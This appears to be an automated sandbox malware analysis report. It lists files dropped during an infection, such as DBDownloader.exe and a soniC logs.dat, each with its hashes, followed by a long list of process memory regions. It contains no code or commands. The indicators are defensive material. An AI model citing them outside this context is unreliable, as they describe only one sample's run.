                                                                                                                                                                                                                                                5a199c40e75d80cdab7a24b46a076863e89afb63

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                d38fba8b25a38b1c00af4c76269c93e58b7c0bd3478989864f8c8bcd9a9d46e7

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                dd9f10bf168750a882064b18f325ce350faa6dfb367974f1e2301c30cd5ac094c95ecdbf42a6bc4e643019f2b1e204f0d5bcc0964f9e82afa0eff6275479997f

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\melt.txt

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                44B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                298802dff6aa26d4fb941c7ccf5c0849

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                11e518ca3409f1863ebc2d3f1be9fb701bad52c0

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                df99fdbdf7b92b29b1bf1ca4283b4de2e04643b9739d2d1089ab5808e8e5665d

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                0301017dfef1b74855d6535f3fd542257689479cb933c2e8742b5b6b94e26107fa38e7fc21bdb83d45184750eced344856092330fb30a1ebbc24b2b9004c8946

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\app

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                5014379cf5fa31db8a73d68d6353a145

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                2a1a5138e8c9e7547caae1c9fb223afbf714ed00

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                538b830838cbf62e6ce267b48e2eb165030686e5b6317f0b1e9205a3e08c73b8

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                5091a16ef7730449601a70b5ef5512a93c98c76beb8cfee1adc9d39780c49b1d712e764720b04e44e18c7b08633c5d453793462c18dc6bef14d82bf69892e18f

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\soniC\logs.dat

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                102B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                eb763045cf5455eda5ef2f75af8a5ad8

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                d27f89054cddffe226835059655a36c52960075c

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                c1797f5a4b18d7ac3221ee44dd29cbb3df0ef20052caf8a7ef723940859b9796

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                40ca5dabc392828193e92d45a44623647fc0a064857876b43d416a22b7ccc8a00f39103c478cf8759e3b7c359d1db214abbbcc26c7cb025c12ef340f430557f9

                                                                                                                                                                                                                                              • C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                3.3MB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                32988cd64d1e643b30203cb3a99f01c6

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                b706ad0b4995f09697bd562fa9fcec07d687ee33

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                9c26112798af866022db506c5a8592bc6baf19a81dd600a67becfb581a0dae70

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                7eda4e061a87efc9db79f31391807cd887f6b02d677d421598eee1324e27d9132d45c918ad342c2d84def6e56432b4025dd075a8fc8d5175ae1ed23850ef8ae9

                                                                                                                                                                                                                                              • C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\Curette.dll

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                571bd6140bb7c0daa429da0de6dc2ce1

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                45e0e315767edf25fc5ce4a518a2d41f818c3290

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                1219792a1a5467bf3ebcad4fe73838f89bf0608a61d987d9b72605d995829552

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                ec8d55fdeec9932afb5eb144803b36926597fb6c2971d597eb9612b43049adc8f64eb67d490efa2dfa77b59649f74bd018400d27fe5050f3eafeacb80d348962

                                                                                                                                                                                                                                              • C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                823KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                a3ccc65ae7d39d213250443588731af9

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                489b07237cf951faca46c6f525d9c436957347f2

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                75542249fc08f4392189a0807595f18580aa17487530bc5527bf928a0b78146c

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                c286e9aef914f008f31de8ce39c7861b8d26459a675d9a17dac80ab3db82e5d3edb04c4382c0c3ef2669a42a0c7867c7399d399d18d9cb154fa7f01111ef702f

                                                                                                                                                                                                                                              • C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\Zip.dll

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                564KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                27cf2e5fecbc9dd6f8a9bc866dc78e00

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                3e11aaa9416d7702ace2176ef27230efd08ec5ab

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                5155ba4c5e46c898a7cb9d619c67a1626636e7854200bbbeb698fb5af3b541f2

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                87ebe9bc31dd6c91b46fc561bb6a9ffd9bcf29eee98da5d58caefa1d4ace940a9aeccc264e4cceb933bbcea10d4b33f95767c803c34badd62ddaec60863344c0

                                                                                                                                                                                                                                              • C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\glucocorticoid.txt

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                51KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                b14b27cad72654c3b49ab32aae9b80d1

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                4304dbab114f5de0373b7a52eae484c577231741

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                a5db93ad3d6e8b4d58ec25282583ca77f70f3a9629f4f23c3c72cbadfc5294ee

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                d330f9a15b04d21f34ff8e6885d71a7b427bc38534d65d124f68c4cf44f77cf8fc0b419a5ed4518fb52f0ddbe4108d5081915ffa9a2ef5cb55b5386b512fa834

                                                                                                                                                                                                                                              • C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\madBasic_.bpl

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                211KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                641c567225e18195bc3d2d04bde7440b

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                20395a482d9726ad80820c08f3a698cf227afd10

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                c2df993943c87b1e0f07ddd7a807bb66c2ef518c7cf427f6aa4ba0f2543f1ea0

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                1e6023d221ba16a6374cfeb939f795133130b9a71f6f57b1bc6e13e3641f879d409783cf9b1ef4b8fd79b272793ba612d679a213ff97656b3a728567588ecfb9

                                                                                                                                                                                                                                              • C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\madDisAsm_.bpl

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                3936a92320f7d4cec5fa903c200911c7

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                a61602501ffebf8381e39015d1725f58938154ca

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                2aec41414aca38de5aba1cab7bda2030e1e2b347e0ae77079533722c85fe4566

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                747ea892f6e5e3b7500c363d40c5c2a62e9fcf898ade2648262a4277ad3b31e0bcd5f8672d79d176b4759790db688bf1a748b09cbcb1816288a44554016e46d3

                                                                                                                                                                                                                                              • C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\madExcept_.bpl

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                437KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                e8818a6b32f06089d5b6187e658684ba

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                7d4f34e3a309c04df8f60e667c058e84f92db27a

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                91ee84d5ab6d3b3de72a5cd74217700eb1309959095214bd2c77d12e6af81c8e

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                d00ecf234cb642c4d060d15f74e4780fc3834b489516f7925249df72747e1e668c4ac66c6cc2887efde5a9c6604b91a688ba37c2a3b13ee7cf29ed7adcfa666d

                                                                                                                                                                                                                                              • C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\rtl120.bpl

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                adf82ed333fb5567f8097c7235b0e17f

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                e6ccaf016fc45edcdadeb40da64c207ddb33859f

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                d6dd7a4f46f2cfde9c4eb9463b79d5ff90fc690da14672ba1da39708ee1b9b50

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                2253c7b51317a3b5734025b6c7639105dbc81c340703718d679a00c13d40dd74ccaba1f6d04b21ee440f19e82ba680aa4b2a6a75c618aed91bd85a132be9fc92

                                                                                                                                                                                                                                              • C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\theophobia.xml

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                807KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                1fa471a09f4b7d85fc76545cca3a1961

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                80ac45cb84b2d2da34c77a021d11f1b3ecd250f6

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                ee9a8633c78d7d559cb20f52aa481699b2b26329e3f8cbd0e5e3d879a53ecb69

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                e5b860462dbd927594212e66130c9d57557618c76f53479a52ad87160294ff632c38c39763354ed01c8413910bca45b23cc35ae1570b6408df70303b0cc9bad6

                                                                                                                                                                                                                                              • C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\vcl120.bpl

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.9MB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                c594d746ff6c99d140b5e8da97f12fd4

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                f21742707c5f3fee776f98641f36bd755e24a7b0

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                572edb7d630e9b03f93bd15135d2ca360176c1232051293663ec5b75c2428aec

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                33b9902b2cf1154d850779cd012c0285882e158b9d1422c54ea9400ca348686773b6bacb760171060d1a0e620f8ff4a26ecd889dea3c454e8fc5fa59b173832b

                                                                                                                                                                                                                                              • memory/2172-229-0x0000000005130000-0x00000000051F4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                784KB

                                                                                                                                                                                                                                              • memory/2172-232-0x0000000005870000-0x0000000005E88000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                6.1MB

                                                                                                                                                                                                                                              • memory/2172-216-0x00000000008F0000-0x0000000000942000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                328KB

                                                                                                                                                                                                                                              • memory/2172-1988-0x0000000006610000-0x0000000006676000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                408KB

                                                                                                                                                                                                                                              • memory/2384-2632-0x0000000000D20000-0x0000000000D36000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                88KB

                                                                                                                                                                                                                                              • memory/2936-3225-0x0000000000480000-0x0000000000506000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                536KB

                                                                                                                                                                                                                                              • memory/2936-3237-0x0000000005C30000-0x0000000005C42000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                72KB

                                                                                                                                                                                                                                              • memory/2980-2528-0x0000000002880000-0x00000000028B6000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                216KB

                                                                                                                                                                                                                                              • memory/2980-2526-0x0000000000860000-0x00000000008F6000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                600KB

                                                                                                                                                                                                                                              • memory/2980-2556-0x000000001B3D0000-0x000000001B3E8000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                96KB

                                                                                                                                                                                                                                              • memory/2980-2555-0x0000000002860000-0x0000000002878000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                96KB

                                                                                                                                                                                                                                              • memory/2980-2533-0x000000001BD30000-0x000000001BEB6000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                              • memory/2980-2531-0x000000001B7B0000-0x000000001B83C000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                560KB

                                                                                                                                                                                                                                              • memory/2980-2532-0x000000001B9F0000-0x000000001BB9A000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.7MB

                                                                                                                                                                                                                                              • memory/3252-2268-0x0000000005E90000-0x0000000005EB8000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                160KB

                                                                                                                                                                                                                                              • memory/3252-2129-0x0000000004BC0000-0x0000000004C36000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                472KB

                                                                                                                                                                                                                                              • memory/3252-2125-0x0000000004B20000-0x0000000004B2A000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                              • memory/3252-2365-0x0000000006E90000-0x0000000006EA0000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                              • memory/3252-2094-0x00000000000E0000-0x00000000000EC000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                              • memory/3252-2255-0x0000000005E20000-0x0000000005E3E000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                                              • memory/3676-1944-0x0000000000B30000-0x0000000000B38000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                              • memory/3676-1946-0x0000000005340000-0x0000000005630000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2.9MB

                                                                                                                                                                                                                                              • memory/3676-1954-0x0000000005BE0000-0x0000000006184000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.6MB

                                                                                                                                                                                                                                              • memory/3676-1948-0x00000000050B0000-0x000000000513C000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                560KB

                                                                                                                                                                                                                                              • memory/3676-1950-0x0000000005140000-0x00000000052EA000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.7MB

                                                                                                                                                                                                                                              • memory/3676-1949-0x0000000004EF0000-0x0000000004F12000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                              • memory/3824-131-0x0000000000680000-0x0000000000681000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                              • memory/4072-3214-0x0000000000C90000-0x0000000000CA8000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                96KB

                                                                                                                                                                                                                                              • memory/4152-2295-0x0000000000100000-0x0000000000424000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                3.1MB

                                                                                                                                                                                                                                              • memory/4200-2278-0x0000000004B90000-0x0000000004C52000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                776KB

                                                                                                                                                                                                                                              • memory/4200-2277-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                328KB

                                                                                                                                                                                                                                              • memory/4232-2035-0x0000000000310000-0x0000000000322000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                72KB

                                                                                                                                                                                                                                              • memory/4232-2254-0x0000000004BA0000-0x0000000004C3C000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                624KB

                                                                                                                                                                                                                                              • memory/4356-280-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-282-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-319-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-313-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-330-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-315-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-305-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-2007-0x0000000005C00000-0x0000000005C92000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                584KB

                                                                                                                                                                                                                                              • memory/4356-303-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-1953-0x0000000005970000-0x00000000059BC000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                304KB

                                                                                                                                                                                                                                              • memory/4356-1951-0x00000000059D0000-0x0000000005A70000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                640KB

                                                                                                                                                                                                                                              • memory/4356-2269-0x0000000005CB0000-0x0000000005D04000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                336KB

                                                                                                                                                                                                                                              • memory/4356-1947-0x0000000005760000-0x0000000005802000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                648KB

                                                                                                                                                                                                                                              • memory/4356-249-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-236-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-239-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-243-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-301-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-245-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-266-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-299-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-294-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-292-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-290-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-288-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-286-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-296-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-230-0x0000000000BE0000-0x0000000000D38000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-327-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-233-0x0000000005570000-0x00000000056B8000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-237-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-241-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-247-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-259-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-257-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-285-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-255-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-253-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4356-251-0x0000000005570000-0x00000000056B3000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                              • memory/4468-3128-0x00000000003F0000-0x0000000000714000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                3.1MB

                                                                                                                                                                                                                                              • memory/4480-2179-0x00000000047E0000-0x00000000047EA000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                              • memory/4480-2184-0x0000000004AC0000-0x0000000004C6A000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.7MB

                                                                                                                                                                                                                                              • memory/4480-2176-0x00000000047B0000-0x00000000047DE000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                184KB

                                                                                                                                                                                                                                              • memory/4480-2181-0x0000000004880000-0x000000000490C000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                560KB

                                                                                                                                                                                                                                              • memory/4556-130-0x0000000000400000-0x00000000004C4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                784KB

                                                                                                                                                                                                                                              • memory/4556-0-0x0000000002240000-0x0000000002241000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                              • memory/4908-2609-0x0000000000020000-0x0000000000344000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                3.1MB

                                                                                                                                                                                                                                              • memory/5008-2316-0x0000000000950000-0x000000000098E000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                248KB

                                                                                                                                                                                                                                              • memory/5036-2003-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                              • memory/5036-2240-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                              • memory/5052-2024-0x00007FF9F5883000-0x00007FF9F5885000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                              • memory/5052-125-0x00007FF9F5883000-0x00007FF9F5885000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                              • memory/5052-129-0x00000000009B0000-0x00000000009B8000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                              • memory/5180-2370-0x000000001BD70000-0x000000001BE22000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                712KB

                                                                                                                                                                                                                                              • memory/5180-2369-0x000000001B3B0000-0x000000001B400000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                320KB

                                                                                                                                                                                                                                              • memory/5328-2364-0x0000000005750000-0x0000000005D78000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                6.2MB

                                                                                                                                                                                                                                              • memory/5328-2416-0x00000000077B0000-0x0000000007846000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                600KB

                                                                                                                                                                                                                                              • memory/5328-2411-0x0000000006690000-0x00000000066AE000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                                              • memory/5328-2418-0x0000000007850000-0x0000000007872000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                              • memory/5328-2417-0x0000000006B90000-0x0000000006BAA000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                104KB

                                                                                                                                                                                                                                              • memory/5328-2412-0x0000000006740000-0x000000000678C000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                304KB

                                                                                                                                                                                                                                              • memory/5328-2373-0x00000000060A0000-0x00000000063F4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                3.3MB

                                                                                                                                                                                                                                              • memory/5328-2363-0x00000000050E0000-0x0000000005116000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                216KB

                                                                                                                                                                                                                                              • memory/5328-2372-0x0000000005FC0000-0x0000000006026000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                408KB

                                                                                                                                                                                                                                              • memory/5328-2371-0x0000000005F20000-0x0000000005F42000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                136KB

